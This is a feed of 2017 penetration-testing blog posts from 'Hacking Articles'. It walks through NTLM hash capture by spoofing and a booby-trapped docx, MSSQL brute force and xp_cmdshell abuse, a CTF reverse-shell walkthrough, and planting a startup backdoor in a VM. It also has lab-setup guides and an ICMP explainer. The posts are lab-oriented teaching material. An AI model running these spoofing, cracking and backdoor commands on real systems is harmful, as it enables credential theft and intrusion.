News from 'Hacking Articles'

Syndicate content
Raj Chandel's Blog
Updated: 16 hours 50 min ago

4 Ways to Capture NTLM Hashes in Network

Sun, 15/Oct/2017 - 20:26

Hello friends! Today we are describing how to capture NTLM Hash in a local network. In this article we had captured NTLM hash 4 times through various methods. Before we proceed towards attacking techniques, let’s read the brief introduction on NTLM Hash.

The acronym for word NTLM is made by combining following terms:

NT: New technologies (Windows)

LAN: Local area network

M: Manager

In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols. It was the default for network authentication in the Windows NT 4.0 operating system that provides authentication, integrity, and confidentiality to users. The NTLMv2 is the latest version and uses the NT MD4 based one way function. The hash lengths are 128 bits and work for local account and Domain account.

The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller), and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password.

For more information visit Wikipedia.org

Let’s Begin!!

Requirement

Attacker: Kali Linux

Target: Windows 10

Capture NTLMv2 hash through Sniffing  

Being as attacker open etter.dns file from inside /etc/ettercap  in your Kali Linux system then replace whole text by editing given below line includes attacker’s IP and save the text document.

* A 192.168.1.103

Now follow the given bellow step to run ettercap to start sniffing.

  • Application > sniffing and spoofing > ettercap
  • Click on sniff and Select your network interface.
  • Scan for host to generate target list.

Select the host and add to target, from given image you read among 5 hosts I had chose 192.168.1.101 as target and add to target 1.

Click on MITM from menu bar to select ARP Poisoning, a dialog box will pop-up now enable “sniff remote connects” and click ok.

After then click on plugins option from menu bar and choose dns_spoof

By making use of dns_spoof attacker can redirect victim’s network traffic on his network IP, so that whatever victim will open on his web browser will get redirect on attacker’s IP.

Now load metasploit framework and execute following code to make use of http_ntlm module.

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.1.103

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

Now according to above trap set for victim this module will capture NTLM password of victim’s system when he will open any http web site on his browser which will redirect that web site on attacker’s IP.

From given below image you can notice victim is trying to browse “hackingarticles.in” on his web browser but it requires authentication which is requesting for his username and password. Now if he try to open something else let says google.com there also it will ask username and password for authentication, until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, attacker at background will capture NTLM hash on his system.

Great!! The attacker had captured NTMLv2 hash, now let count detail apart from hash value that the attacker has captured.

From given image you can see that attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & spoof NBNS

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.

use auxiliary/server/capture/smb

msf auxiliary(smb) > set srvhost 192.168.1.103

msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb

msf auxiliary(smb) > exploit

Simultaneously run NBNS_response module under capture smb module.

This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.

use auxiliary/spoof/nbns/nbns_response

msf auxiliary(nbns_response) > set SPOOFIP 1192.168.1.103

msf auxiliary(nbns_response) > set INTERFACE eth0

msf auxiliary(nbns_response) >exploit

As result this module will generate a fake window security prompt on victim’s system to establish connection with another system in order to access share folders of that system.

We had use nmap UDP and TCP port scanning command for identifying open ports and protocol and from given image you can port 137 is open for NetBIOS network service.

Now victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to demonstrate that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake window security alert prompt, which will ask victims to enter his username and password for accessing share folders.

Awesome!! Once again the attacker had captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Capture NTLMv2 hash through capture SMB & word UNC injector

This module modifies a .docx file that will, upon opening, submit stored netNTLM credentials to a remote host. It can also create an empty docx file. If emailed the receiver needs to put the document in editing mode before the remote server will be contacted. Preview and read-only mode do not work. Verified to work with Microsoft Word 2003, 2007, 2010, and 2013.

use auxiliary/docx/word_unc_injector

msf auxiliary(word_unc_injector) >set lhost 192.168.1.103

msf auxiliary(word_unc_injector) >exploit

It has created an empty docx file under given path /root/.msf4/local/

Now send this msf.docx file to victims and again run capture smb module in metasploit framework as done priviously.

From given below image you can observe that in order to get the hashes the auxiliary/server/capture/smb module has been used.

As the victim will open msf.docx file, again the attacker had captured NTMLv2 hash on his system. The only difference between above two attacks and in this attack is that here we had only captured NTLMv2 hash.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Responder

NBT-NS/LLMNR Responder Created by Laurent Gaffie which is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server that can perform above all attacks. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool will only answer to File Server Service request, which is for SMB.

This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587 and Multicast UDP 5553.

Now open the new terminal and type following command to download it from github:

git clone https://github.com/SpiderLabs/Responder.git

cd Responder

Once it gets downloaded execute following command to run the python script.

python Responder.py –I 192.168.1.103 -I eth0

From specified image you can perceive that all poisoners and server services gets ON.

Now again victim will try to access share folder therefore he will try of connect with him (attacker) through his network IP, given below image is a proof to display that victim is connecting attacker’s IP: 192.168.1.103.

When victim will try to access share folder, he will get trap into fake network error alert prompt, as shown in given below image.

Once again the attacker had successfully captured NTMLv2 hash, from given image you can see that here also the attacker has captured two things more:

Username: pentest

Machine name: Desktop-UKIQM20

It will store captured NTLM hash in a text document under given /root/Desktop/Responder/logs.

Again use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm we had successfully retrieved the password: 123 for user: pentest by cracking ntlmv2 hash.

Wonderful! These were the four ways to trap the target user in order to capture NTLM hash.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 4 Ways to Capture NTLM Hashes in Network appeared first on Hacking Articles.

Categories: Cyber India

MSSQL Peneration Testing using Nmap

Fri, 13/Oct/2017 - 23:05

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Lets start!!

Scan port 1433

Open the terminal in kali linux and scan target IP for port 1433 using nmap command.

nmap -p 1433 192.168.1.104

From given below image you can observe that port 1433 is open for MS-SQL service.

Enumerating version information

Given below command will attempt to determine configuration and version information for Microsoft SQL Server instances.

nmap -p 1433 –script ms-sql-info 192.168.1.104

In specified below image you can observe the install version and details of MS-SQL server.

Brute Force Attacker

Given below command will attempt to determine username and password through brute force attack against MS-SQL by means of username and password dictionary.

nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.104

In specfied image you can observe that we had successfully retrieve credential for two users:

  • Username: ignite and password:12345
  • Username: sa and password:123

Execute MS-SQL Query

Once you have retrieved the login credential use these credential in NMAP script to execute MS –SQL query. Given below will try to execute certain query “sp_database” against Microsoft SQL server.

Specified query “sp_databases” is part of record Stored Procedures and dump a list of database names from an instance of the SQL Server.

nmap -p 1433 –script ms-sql-query –script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query=“sp_databases” 192.168.1.104

Hence as result it has dumped two database names “ignite & master” whereas master is the default database name of MS_SQL server.

Check Microsoft SQL server configuration

 Following command will attempt to describe Microsoft SQL server configuration setting by passing login credential as argument through nmap script.

nmap -p 1433 –script ms-sql-config –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

Hence you can check configuration setting from given below image.

Obtain list of tables

Following command will attempt to fetch list of tables from inside Microsoft SQL server by passing login credential as argument through nmap script.

nmap -p 1433 –script ms-sql-tables –script-args mssql.username=sa,mssql.password=admin123

192.168.1.104

Hence you can check list of tables from given below image.

Enumerate NetBIOS information

Given below NMAP script will enumerate information from remote Microsoft SQL services with NTLM authentication enabled.

Sending a MS-TDS NTLM authentication request with an invalid domain and null credentials will cause the remote service to respond with a NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.

 nmap -p 1433 –script ms-sql-ntlm-info 192.168.1.104

Hence from given below image you can read the NETBIOS information remote Microsoft SQL server.

Dump password hashes

Following command will dump the password hashes from an MS-SQL server in a format suitable for cracking by tools such as John-the-ripper. In order to do so the user needs to have the appropriate DB privileges.

nmap -p 1433 –script ms-sql-dump-hashes –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can observe that it has dumped the hash value of passwords of user: sa which we have enumerated above.

Identify database owner

Following command will execute a query against Microsoft SQL Server instances for a list of databases a user has access to. In order to do so the user needs to have the appropriate DB privileges. Therefore we have passes username and password as argument through NMAP script.

nmap -p 1433 –script ms-sql-hashdbaccess –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

In specified image you can observe that it showing user sa is owner the database “ignite”.

Ms-SQL Allows XP_cmdshell option

The xp_cmdshell is a function of Microsoft SQL Server that allows system administrators to execute operating system command. By default, the xp_cmdshell option is disabled.

From given below image you can see we had enable the xp_cmdshell function by executing following statement inside master database.

EXEC sp_configure ‘xp_cmdshell’;

Now save above configuration setting through following statement:

 RECONFIGURE;

Exploit XP_cmdshell Function

Now following NMAP script will attempt to run a command using the command shell of Microsoft SQL Server if found xp_cmdshell is enabled in targeted server.

nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=admin123 192.168.1.104

From given image you can confirm that we have executed OS command: net user as retrieve user account.

Blank password lead to unauthorized access

If the admin of Microsoft-SQL Server left the password Blank for login then attacker can director login into database server, from  given below image you can see we are exploring the property of a user’s account “sa”.

Here kept “blank space” as password for user “sa”. As we know by default sa is admin of MS-SQL server and now its password is blank space therefore chances of making unauthorized access into server by attacker will get increases.

Make unauthorized access into SQL server

Following  NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.

nmap -p 1433 –script ms-sql-empty 192.168.1.104

From given below image you can perceive we had made successfully login with user: sa and empty password.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MSSQL Peneration Testing using Nmap appeared first on Hacking Articles.

Categories: Cyber India

Hack the Zico2 VM (CTF Challenge)

Fri, 13/Oct/2017 - 21:52

Hello friends! Today we are going to take another CTF challenge known as Zico2. The credit for making this vm machine goes to “Rafael” and it is another boot2root challenge, where we have to root the system to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.26 but you will have to find our own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.0.26

We find port 80 is open, so we open this ip in our browser.

Browsing through the site we find that, this site is vulnerable to LFI.

We couldn’t find anything special here so we use dirb to find directories.

dirb http://192.168.0.26/

We found an interesting link called dbadmin. We open it in our browser.

When we open this page we find another link; this link leads us to phpliteadmin login page.

We tried the password” admin”, and it granted us access.

We find that this version of phpliteadmin is vulnerable to php code injection.

So we create another database and named it shell.php we use this database to inject php code.

After we inject our code we use LFI to execute our shell. Here we can see that ls command was executed when we execute our shell.

Now we create executable file using msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.25 lport=4444 -f elf > /root/Desktop/shell

We move it to /var/www/html/ and then setup our listener on metasploit.

We then use php code injection to upload our file to the server make it executable, and execute the file.

We execute the php code using LFI and get a reverse shell.

After searching through the files we find password for user zico in /home/zico/worpress/wp-config.php

We use this password to login through ssh.

After searching through the files, we take loot at the sudoers and find that we are allowed to use a few commands as root.

Now we move to /tmp folder and find a few files that we had uploaded. We use zip to gain root privilege by executing shell command along with zip.

sudo -u root zip shell.zip shell.py -T -unzip-command=”sh -c /bin/bash

After gaining root privilege we move to root folder. Inside the root folder we find a file called flag.txt when we open the file. We get greeted by a message congratulating for the completion of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Zico2 VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

MS-SQL Penetration Testing lab Setup

Wed, 11/Oct/2017 - 17:23

Hello friends!! Today you will learn how to install and configure MS SQL server in windows 10 operating system.

Requirement:

  1. Download setup file ENU\x64\SQLEXPR_x64_ENU.exe
  2. Download setup file ENU\x86\SQLManagementStudio_x86_ENU.exe from here
  3. Download heidisql tool

Configure SQL express setup

Open the 1st download file for SQL server installation and run as administration. Click on installation then go with New SQL server standalone installation.

To install sql server2012 follow given below three steps:

  • License terms
  • Product updates
  • Install setup files

Here enable the check box for “I accept the license terms” and click on next.

Enable the check box for “Include SQL server product updates” to enhance the SQL server security and performance. It found 26 MB setup online which will get install when you will click on next.

Now it will start installing SQL server setup file on your system which takes some time. As soon as setup gets installed you will get new window screen of feature selection for your SQL server.

Feature Selection

Now select the features you want to install from given image you can see I had enable check box for following features.

  • Database Engine service
  • SQL Server Replication
  • SQL Client Connective SDK

Click on next.

Instance Configuration

Specify the name and instance ID for instance of SQL server. The directory structure, registry structure, and service names all replicate the instance name and a specific instance ID. Instance ID becomes part of installation path.

  • Enter SQLExpress in text filed for Name Instance
  • Enter SQLExpress in text filed for Instance ID

After then click on next

You can select Default Instance also if an instance of SQL Server is not installed previously. It does not need a user to give the name of the instance to create a connection.

Database Engine Configuration

Specify Database Engine authentication for its security mode   

By default sa is administrator of MS SQL

Under the panel of authentication mode:

  • Click on mixed mode which is combination of both type authentications SQL server and Windows.
  • Type your password and confirm password for administrator account.

From given image you can observe that selected user will be part of administrator account of SQL server who has the unrestricted access over database engine.

After then click on next and next.

Your SQL server 2012 installation completed successfully, here you can check the status for installed features.

Now open the SQL server configuration manger where you will see left and right panel.

Click on protocol for SQLExpress in left panel and then after select protocol name “TCP/IP” in right panel.

Under IP Addresses specify TCP port 1433 tab, Click on Apply and Enable the TCP/IP.

Configure SQL Management Studio setup

Now open 2nd downloaded application for SQL server management setup and add new feature in it.

No updates for SQL server 2012 click on next.

Installation type

Since we have already created instance “SQLExpress” now we can add featured in SQLExpress instance of SQL server 2012.

From given below image you can observe the table for installed instance. Click on next

Feature selection

For installation of instance feature enable the check box for Management tool basic as shared featured then click on next and next.

Management tool basic installation completed successfully, here you can check the status for installed features. Click on installation then go with New SQL server standalone installation.

Now login into SQL Server using admin credential and click on connect.

Once you are login into SQL server then Explore security folder and create a new login account for other users.

Enter the user name as I had given “ignite” and set password by choosing sql server authentication for this user.

From given image you can observe that master is default database.

Connect to server

Run heidisql tool to connect with MS SQL Server through Ignite user as given below:

Network type: TCP/IP

Hostname /IP: 192.168.1.104

User: ignite

Password: 123456

Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQLserver, Microsoft SQL databases and PostgreSQL. It enables you to browse and edit data, create and edit tables, views, procedures, triggers and scheduled events.

Now click on open

Great!! We have successfully access the database system of MSSQL server. You can modify or create new table or new database and much more things.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MS-SQL Penetration Testing lab Setup appeared first on Hacking Articles.

Categories: Cyber India

Post Exploitation in VMware Files with Meterpreter

Tue, 10/Oct/2017 - 22:56

Hello friends!! Today you will how to exploit any operation system running inside the virtual machine.

Requrement

Attacker: kali linux

Target: VM image windows server 2012

First attacker needs to exploit actual operating system of victim PC and attain the meterpreter session with admin privileges.

From given image you can perceive I have seize windows 10 meterpreter session and also gained admin privileges. 

meterpreter > sysinfo

When you install any operating system in your vmware workstation then all its hardware and network setting get store as .vmx file in actual operating system in order to create new virtual image.

Type following for making search of .vmx file stored in it

meterpreter > search –f *.vmx –r

From given image you can perceive that it has dump the all location where .vmx files are stored.

Using cat command you can read the content of file as these file simple text document which contain vm setting information.

We had opened windows server 2012 vm image through cat command.

meterpreter > cat “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

Here from given below image you can read the details of this file which is describing network and hardware setting.

This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.

use post/windows/manage/vmdk_mount

msf post(vmdk_mount) > set DEL_LCK true

msf post(vmdk_mount) > set READ_MODE false

msf post(vmdk_mount) > set session 2

msf post(vmdk_mount) > set VDK_PATH “d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx”

msf post(vmdk_mount) > run

Great!! We have successfully mount vmdk file of windows server2012.

meterpreter > show_mount

Now from given below image you can read the information of each drives.

Now using given below command I will upload an exe backdoor in L: drive which will give us reverse connection of windows server 2012 when it will be running inside vm workstation.

meterpreter > upload /root/Desktop/abc.exe “L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup”

use exploit/multi/handler

msf exploit(handler) >set payload windows/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.1.113

msf exploit(handler) >set lport 445

msf exploit(handler) >run

 Awesome!! We have successfully exploited windows server2012 virtual machine and gained its meterpreter session.

meterpreter >sysinfo

Source: http://www.shelliscoming.com/2017/05/post-exploitation-mounting-vmdk-files.html

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Post Exploitation in VMware Files with Meterpreter appeared first on Hacking Articles.

Categories: Cyber India

Lab Setup for VOIP Penetration Testing

Mon, 09/Oct/2017 - 20:39

Hello friends! Today you will learn how to setup VOIP in virtual machine using tribox 2.8.0.4 iso image for making phone calls and sending text messages in local network.

From Wikipedia

Voice over Internet Protocol (also voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

Let’s start!!

Open vmware, select option “creates new virtual machine”, now for install from wizard select third option:

I will install operating system later

Then click on next.

Now select 2nd option “Linux” for guest operating system and select version “ubuntu”. Then click on next and next as per your requirements.

Explore custom hardware for making following changes:

Click on CD/DVD to browse ISO file “tribox 2.8.0.4”.

Select bridges connection and enable the check box for replicate connection for network adapter setting.

Then click on finish.

Trixbox is the world’s most popular Asterisk-based distribution. Trixbox enables even the novice user to quickly set up a voice over IP phone system and other necessary applications such as mysql and more. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million minute a month call center.

It will start rebooting the vm automatically, now for TRIBOX CE installation follow given below steps:

A dialog box will appear for selecting option keyboard type, here chose option “US” as given in below image. Then click on OK tab.

Another dialog box will ask to choose time zone, select Asia/ Kolkata. Then click on OK tab.

Now enter the password you want to give for root user. I had given tribox as password. Again type confirm password and then click on OK tab.

Now it will start installation process automatically which will take some time as shown in given below image. Do not disturb installation until it becomes 100 % completely.

Once installation will complete it will ask for login. Type username: root and password: tribox

Check network interface using “ifconfig” command, now from here I came to know my vm IP: 192.168.1.218.

Now open this IP: 192.168.1.218 in web browser. Here through Tribox GUI we are going to create some users account by assigning them extension number. For example you received 8 digit numbers for your land-line from service providers.

By default tribox GUI open with user mode and for creating extension number we need to switch into admin mode.

Click on switch option from user mode given on top of right corner.

The authentication is required for login into admin mode of tribox.

Now enter username: maint and password: password as admin credential.

You will get a pop up message for tribox registration, close this message.

At tribox platform you will see server status, now click on PBX option and select PBX setting option from given menu.

Under setup list of admin select extensions option as basic setup.

Select device

Now follow given below steps for creating an extension inside the server:

Device: generic SIP device

Click on submit

Add extension

User extension: 1234567 (any 7/8 digit number)

Display name: ignite (name of user/ customer you want assign this number)

Device options

Secret: 123

Dtmfmode: rfc2833

Once you have enter the information for creating a new extension click on submit.

Similarly create one more extension so then we can check communication between both extensions.

From given image you can see now we had configured two extension 1st for ignite [1234567] and 2nd for raj[12345678].

We had created two extensions one as caller and other as receiver. You can create multiple extension as per your requirement.

Now click on orange color tile for apply configuration changes to put them into effect.

A pop will open here select continue with reload

Now this is all about server installation and configuration of extension inside it.

Now download ZOIPER application in your system

Zoiper is a VoIP softphone that lets you send messages, make voice and video calls with your friends, family, colleagues and business partners.

Once it is downloaded it will look like as given below image, now go with setting option for configuration of an account which will be able to make call or receive call from another user.

Select account type SIP and click on next.

If you remember in tribox GUI we had add an extension 1234567 for ignite now enter those information in account wizard in order to save it as new contact.

Now enter user number with server IP as given below

1234567@192.168.1218

Enter password for this account.

Click on next.

It will auto detect the account name as shown in given image. Then click on next.

Your one account has been created in accounted list. Now ignite will be able to make calls or receive calls from another users.

We have already created ignite account in system through zoiper for making and receiving calls. Now we need to install zoiper on other device for other users also, who will be able to make or receive call from ignite.

Download zoiper from Google play stores in your android phone.  Run the application after installation.

Click on config icon for configuration of a new account in your phone as shown in given image and select Accounts option from given list of configuration settings.  

Then a new window will open click on add account. A dialog box will appear for account setup click on YES.

Now again a new dialog box will pop up select manual configuration for account setup.

Go for SIP as account type you have chose.

Now enter following information for SIP account setting:

Account name: raj

Host: 192.168.1.218

Username: 12345678

Password: 123

Now click on save.

You can see from given image that account for raj is ready.

Hence we have setup two accounts in zoiper one will act as caller let say raj is caller making call to ignite through his phone and ignite will be receiver and get incoming call on system from raj.

As you know we had configured two extension one for ignite another for raj. Now we are going to test this VOIP setup by making call from raj.

Raj had made call to ignite by dialing his number 1234567 and when you will perform this you will hear the outgoing bell from your phone.

Ignite will get incoming call on system as shown in given image. Click on answer for accepting call from raj.

From given screenshot you can see that the call is connected and raj and ignite is having conversation over VOIP call.

Great!!! Hence in this way you can configure your VOIP server for local network and can communicate with multiple users by making calls or chat.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post Lab Setup for VOIP Penetration Testing appeared first on Hacking Articles.

Categories: Cyber India

Understanding Guide to ICMP Protocol with Wireshark

Sat, 07/Oct/2017 - 23:24

From Wikipedia

The Internet Control Message Protocol (ICMP) is a supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information which indicates that a requested service is not available or that a host or router could not be reached.

It is layer 3 i.e. network layer protocol used by the ping command for sending message through ICMP payload which is encapsulated with IP Header packet.  According to MTU the size of ICMP packet cannot be greater than 1500 bytes.

ICMP packet at Network layer

IP header ICMP header ICMP payload size   MTU (1500) 20 bytes 8 bytes 1472 bytes  (maximum) 20 + 8 + 1472 = 1500

ICMP packet at Data Link layer

Ethernet header IP header ICMP header ICMP payload size   MTU (1514) 14 20 bytes 8 bytes 1472 bytes  (maximum) 14 + 20 + 8 + 1472 = 1514

ICMP Message code & Packet description with Wireshark

ICMP message contains two types of codes i.e. query and error.

Query: The query messages are the  information we get  from a router or another destination host.

For example given below message types are some ICMP query codes:

  • Type 0 = Echo Reply
  • Type 8 = Echo Request
  • Type 9 = Router Advertisement
  • Type 10 = Router Solicitation
  • Type 13 = Timestamp Request
  • Type 14 = Timestamp Reply

A ping command sends an ICMP echo request to the target host. The target host responds with an echo Reply which means target host is alive.

Here we are going to test how ping command helps in identifying alive host by Pinging host IP.

Ping 192.168.0.105

From the given below image you can see reply from host; now notice few more things as given below:

  • Default size of payload sent by source machine is 32 bytes (request)
  • Same size of payload received by source machine is 32 bytes from Destination machine (reply)
  • TTL = 128 which means host machine is windows system.
  • Total packets are 8, 4 packet of request and 4 of reply.

Look over the sequence of packet transfer between source and destination captured through wireshark.

Total numbers of packet captured is 8, 4 for request and 4 for reply between source and destination machine.

 The 1st packet is send by source machine is ICMP echo request and if you look by the  given below image, you will observe highlighted text is showing ICMP query code: type 8 echo ping request.

Length of frame is 74 now  as explained in the below table:

Ethernet header IP header ICMP header ICMP payload size   MTU (1514) 14 20 bytes 8 bytes 32  (default) 14+20+8+32=74

 

Similarly given below image is showing details of 2nd packet i.e.  Echo reply, you can observe that the highlighted text is showing ICMP query code: type 0 echo ping reply.  

Error: The error statement messages reports problem which a router or a destination host may generate.

For example: given below message types are some of the ICMP error codes:

  • Type 3 = Destination Unreachable
  • Type 4 = Source Quench
  • Type 5 = Redirect
  • Type 11 = Time Exceeded
  • Type 12 = Parameter Problems

When we ping an IP sometime we don’t get echo ping reply from the host machine, instead of that we get some reply such as destination unreachable or time exceeded this is known as ICMP error reporting message. There are so many reasons behind such kind of error message, possibily a host in a  network is down or firewall is blocking your ping request.

The 1st packet send by source machine is ICMP echo request and if you observe by the given below image the highlighted text is showing ICMP query code: type 8 echo ping request.

Similarly given below image is showing detail of 2nd packet i.e.  Destination unreachable, you can observe that it is showing ICMP error code: type 3.  

 ping –a 192.168.0.105

-a : Resolve IP addresses to host-name, identify’s that reverse name resolution is carried out on the host IP address. If it is successful, ping shows the matching host name.

From the given below image you can observe that,  instead of ICMP protocol the ping request has been send through NBNS (NetBIOS Name service)protocol through port 137 which is a UDP port.

After applying UDP filter you can read host name captured by wireshark “WIN-1GKSSJ7D2AE” is the part of workgroup.

By default a ping send’s 4 packet of request and receives same number of packet as reply from the host. You can increase or decrease this number of packet by using given below command.

ping –n 2 192.168.0.105

-n: Number of echo requests to send

As we had set -n as 2  packets of request hence we got two packet as reply.

Similarly we can also set TTL (Time to Live) for echo request packet, by default 4 packet of request query are sent from source machine at the rate of 1 millisecond per packet. Suppose we want to give TTL between two packets, set -i as 5ms so that after the first packet is delivered the second packet is sent after 5ms.

Ping –i 5 192.168.0.105

-i TTL: Time To Live

Let’s verify TTL for packet sent from source to destination though wireshark. Now if you observe by the given below image you will notice that every echo ping request packet has TTL 5 but every echo reply has default TTL value i.e.128.

ICMP payload description through Wireshark

As we have discuss above default size of ICMP payload is 32 bytes and maximum is 1472, if the size of payload packet is greater than 1472 then packet get’s fragmented into small packets.

From the given below image you can observe source has pinged the host which carries default 32 bytes size payload.   

Now let check the information payload carries from source to destination using wireshark. From the given below image you can read that highlighted texts are alphabets that has been used as 32 bytes payload.

The alphabet is the combination 26 letters but in 32 bytes payload, they are used as:

abcd——uvw are 23 letter only 9 letter needed more to complete 32 bytes therefore again it included 9 alphabets more  i.e. abcdefghi

You can reset the size of payload using following command that  will carry echo ping request from source to destination.

ping -l 33 192.168.0.105

As we have seen above the 32 bytes payload carry data in the form of alphabets abcd—-uvw and then abcd—hi.  Hence if the size of payload is 33 then data should start from abcd—-uvw and then abcd—hij.  Alphabet “j” must be the last payload of data packet.

From the given image you can confirm that Alphabet “j” is the last payload of data packet, In this way increasing the payload size will add an alphabet letter into data packet.

Length of frame has become 75 now as shown in below table:

Ethernet header IP header ICMP header ICMP payload size   MTU (1514) 14 20 bytes 8 bytes 33  (default) 14+20+8+33=75

Now we are sending maximum size of payload using following command.

Ping -l 1472 192.168.0.105

From the given below image you can see reply from host machine.

According to MTU if the size of payload is set to 1472 then frame size will become 1514 as explain above, let’s verify it from wireshark.  From given below image you can read length of frame is 1514 and highlighted text is showing data of 1472 bytes payload.

When the size of payload is greater than 1472 or too large for a network to hold and reach at a router, the router breaks it into smaller packets (fragments).

ping -l 1473 192.168.0.105

From the given below image you can see now size of payload is 1473 which carries echo ping request from source to destination.

From the given image you can confirm that when payload is more than 1472 ICMP packet it gets fragmented as per below table:

Ethernet header IP header ICMP header ICMP payload size   MTU (1514) 14 20 bytes 8 bytes 1472 14+20+8+1472=1514 14 20 – 1 35

If you separate Ethernet header and IP header the size of payload will be 1480 bytes as shown below.

Using –f option with ping command will not allow packet fragmentation in network.

ping –f –l 1472 192.168.0.105

-f:  Set Don’t Fragment flag in packet

From the given below image you can observe remote host  has set (don’t) fragment flag which will not allow router to fragment the payload packets. More over 1472 bytes payload didn’t need fragmentation by router. 

If the packet size 1473 is set with (don’t) fragment flag with ping, the router will reject the packet and will display an ICMP message that the packet needs to be fragmeted because of MTU size limit of 1500 bytes

IP header ICMP header ICMP payload size   MTU (1500) 20 bytes 8 bytes 1473 bytes  (without fragment) More than 1500 bytes   Not possible

 Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Understanding Guide to ICMP Protocol with Wireshark appeared first on Hacking Articles.

Categories: Cyber India

Telnet Pivoting through Meterpreter

Fri, 06/Oct/2017 - 21:54

In our previous tutorial we had discussed on SSH pivoting and today we are going to discuss Telnet pivoting.

From Offensive Security

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine (client): window operating system with two network interface

Target Machine: Ubuntu server (Allow telnet service)

Exploit pivot machine

Use exploit MS17-010 or multi handler to hack the pivot machine.

sessions

From given image you can confirm that I owned pivot machine (192.168.1.107) meterpreter session1.

Check network interface through following command:

Meterpreter> ifconfig

